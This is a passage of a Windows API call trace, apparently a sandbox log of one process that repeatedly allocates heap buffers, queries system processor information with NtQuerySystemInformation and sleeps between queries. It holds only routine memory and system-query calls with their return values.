[0292.896] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c5e0 | out: hHeap=0x2560000) returned 1 [0292.896] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0292.897] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0292.897] Sleep (dwMilliseconds=0x110) [0292.908] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d8a0 [0292.908] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d8a0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0292.909] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d8a0 | out: hHeap=0x2560000) returned 1 [0292.909] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a8e8 [0292.909] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a8e8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a8e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0292.909] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a8e8 | out: hHeap=0x2560000) returned 1 [0292.909] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b938 [0292.909] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b938, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b938, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0292.910] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b938 | out: hHeap=0x2560000) returned 1 [0292.910] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d0d0 [0292.910] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d0d0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d0d0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0292.910] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d0d0 | out: hHeap=0x2560000) returned 1 [0292.910] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0292.911] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0292.911] Sleep (dwMilliseconds=0x110) [0292.923] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6a8 [0292.923] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6a8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0292.924] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6a8 | out: hHeap=0x2560000) returned 1 [0292.924] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a748 [0292.924] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a748, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a748, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0292.924] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a748 | out: hHeap=0x2560000) returned 1 [0292.924] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bd60 [0292.924] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bd60, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bd60, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0292.925] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bd60 | out: hHeap=0x2560000) returned 1 [0292.925] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c838 [0292.925] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c838, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c838, ResultLength=0x19ee88*=0xc0) returned 0x0 [0292.926] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c838 | out: hHeap=0x2560000) returned 1 [0292.926] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0292.927] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0292.927] Sleep (dwMilliseconds=0x110) [0292.939] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d868 [0292.939] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d868, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d868, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0292.940] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d868 | out: hHeap=0x2560000) returned 1 [0292.940] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a950 [0292.940] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a950, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a950, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0292.941] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a950 | out: hHeap=0x2560000) returned 1 [0292.941] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb00 [0292.941] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb00, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb00, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0292.942] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb00 | out: hHeap=0x2560000) returned 1 [0292.942] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c5e0 [0292.942] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c5e0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c5e0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0292.942] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c5e0 | out: hHeap=0x2560000) returned 1 [0292.942] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0292.943] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0292.943] Sleep (dwMilliseconds=0x110) [0292.950] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d8a0 [0292.951] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d8a0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0292.955] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d8a0 | out: hHeap=0x2560000) returned 1 [0292.955] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a678 [0292.955] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a678, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a678, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0292.955] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a678 | out: hHeap=0x2560000) returned 1 [0292.955] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c058 [0292.955] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c058, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c058, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0292.956] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c058 | out: hHeap=0x2560000) returned 1 [0292.956] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d008 [0292.956] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d008, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d008, ResultLength=0x19ee88*=0xc0) returned 0x0 [0292.957] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d008 | out: hHeap=0x2560000) returned 1 [0292.957] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0292.957] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0292.957] Sleep (dwMilliseconds=0x110) [0292.972] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7f8 [0292.972] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7f8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7f8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0292.972] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7f8 | out: hHeap=0x2560000) returned 1 [0292.973] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a818 [0292.973] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a818, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a818, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0292.973] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a818 | out: hHeap=0x2560000) returned 1 [0292.973] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bfc0 [0292.973] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bfc0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bfc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0292.974] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bfc0 | out: hHeap=0x2560000) returned 1 [0292.974] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c518 [0292.974] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c518, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c518, ResultLength=0x19ee88*=0xc0) returned 0x0 [0292.974] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c518 | out: hHeap=0x2560000) returned 1 [0292.974] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0292.975] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0292.975] Sleep (dwMilliseconds=0x110) [0292.985] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d750 [0292.985] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d750, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d750, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0292.985] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d750 | out: hHeap=0x2560000) returned 1 [0292.986] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a678 [0292.986] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a678, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a678, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0292.986] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a678 | out: hHeap=0x2560000) returned 1 [0292.986] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bf28 [0292.986] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bf28, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bf28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0292.987] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bf28 | out: hHeap=0x2560000) returned 1 [0292.987] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cc20 [0292.987] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cc20, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cc20, ResultLength=0x19ee88*=0xc0) returned 0x0 [0292.987] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cc20 | out: hHeap=0x2560000) returned 1 [0292.987] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0292.987] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0292.988] Sleep (dwMilliseconds=0x110) [0293.002] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d868 [0293.002] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d868, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d868, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0293.003] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d868 | out: hHeap=0x2560000) returned 1 [0293.003] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ac28 [0293.003] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ac28, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ac28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0293.004] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ac28 | out: hHeap=0x2560000) returned 1 [0293.004] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c3e8 [0293.004] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c3e8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c3e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0293.004] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c3e8 | out: hHeap=0x2560000) returned 1 [0293.004] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c5e0 [0293.004] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c5e0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c5e0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0293.005] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c5e0 | out: hHeap=0x2560000) returned 1 [0293.005] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0293.005] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0293.005] Sleep (dwMilliseconds=0x110) [0293.017] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d670 [0293.017] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d670, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d670, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0293.018] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d670 | out: hHeap=0x2560000) returned 1 [0293.018] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a950 [0293.018] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a950, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a950, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0293.018] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a950 | out: hHeap=0x2560000) returned 1 [0293.018] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b640 [0293.018] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b640, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b640, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0293.019] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b640 | out: hHeap=0x2560000) returned 1 [0293.019] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ce78 [0293.019] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ce78, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ce78, ResultLength=0x19ee88*=0xc0) returned 0x0 [0293.019] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ce78 | out: hHeap=0x2560000) returned 1 [0293.020] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0293.020] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0293.020] Sleep (dwMilliseconds=0x110) [0293.033] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d830 [0293.033] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d830, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d830, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0293.034] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d830 | out: hHeap=0x2560000) returned 1 [0293.034] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ac28 [0293.034] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ac28, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ac28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0293.034] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ac28 | out: hHeap=0x2560000) returned 1 [0293.034] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb98 [0293.034] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb98, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb98, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0293.035] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb98 | out: hHeap=0x2560000) returned 1 [0293.035] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ca90 [0293.035] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ca90, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ca90, ResultLength=0x19ee88*=0xc0) returned 0x0 [0293.035] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ca90 | out: hHeap=0x2560000) returned 1 [0293.035] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0293.036] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0293.036] Sleep (dwMilliseconds=0x110) [0293.049] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7c0 [0293.049] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7c0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7c0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0293.050] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7c0 | out: hHeap=0x2560000) returned 1 [0293.050] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a880 [0293.050] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a880, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a880, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0293.050] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a880 | out: hHeap=0x2560000) returned 1 [0293.050] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b770 [0293.050] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b770, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b770, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0293.051] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b770 | out: hHeap=0x2560000) returned 1 [0293.051] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c5e0 [0293.051] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c5e0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c5e0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0293.051] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c5e0 | out: hHeap=0x2560000) returned 1 [0293.051] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0293.052] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0293.052] Sleep (dwMilliseconds=0x110) [0293.100] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d520 [0293.100] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d520, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d520, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0293.100] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d520 | out: hHeap=0x2560000) returned 1 [0293.100] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a880 [0293.100] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a880, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a880, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0293.101] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a880 | out: hHeap=0x2560000) returned 1 [0293.101] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb00 [0293.101] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb00, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb00, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0293.101] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb00 | out: hHeap=0x2560000) returned 1 [0293.101] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c900 [0293.101] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c900, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c900, ResultLength=0x19ee88*=0xc0) returned 0x0 [0293.102] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c900 | out: hHeap=0x2560000) returned 1 [0293.102] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0293.102] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0293.105] Sleep (dwMilliseconds=0x110) [0293.125] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d788 [0293.125] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d788, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d788, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0293.126] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d788 | out: hHeap=0x2560000) returned 1 [0293.126] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a5a8 [0293.126] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a5a8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0293.126] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a5a8 | out: hHeap=0x2560000) returned 1 [0293.126] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295ba68 [0293.126] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ba68, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295ba68, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0293.127] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ba68 | out: hHeap=0x2560000) returned 1 [0293.127] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c518 [0293.127] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c518, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c518, ResultLength=0x19ee88*=0xc0) returned 0x0 [0293.127] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c518 | out: hHeap=0x2560000) returned 1 [0293.127] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0293.127] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0293.128] Sleep (dwMilliseconds=0x110) [0293.142] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d750 [0293.142] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d750, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d750, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0293.143] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d750 | out: hHeap=0x2560000) returned 1 [0293.143] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a5a8 [0293.143] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a5a8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0293.143] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a5a8 | out: hHeap=0x2560000) returned 1 [0293.143] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bf28 [0293.143] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bf28, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bf28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0293.144] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bf28 | out: hHeap=0x2560000) returned 1 [0293.144] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c838 [0293.144] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c838, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c838, ResultLength=0x19ee88*=0xc0) returned 0x0 [0293.144] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c838 | out: hHeap=0x2560000) returned 1 [0293.144] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0293.145] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0293.145] Sleep (dwMilliseconds=0x110) [0293.158] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6a8 [0293.158] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6a8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0293.159] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6a8 | out: hHeap=0x2560000) returned 1 [0293.159] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a950 [0293.159] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a950, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a950, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0293.159] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a950 | out: hHeap=0x2560000) returned 1 [0293.159] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b808 [0293.159] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b808, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b808, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0293.160] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b808 | out: hHeap=0x2560000) returned 1 [0293.160] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cce8 [0293.160] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cce8, Length=0xc0, 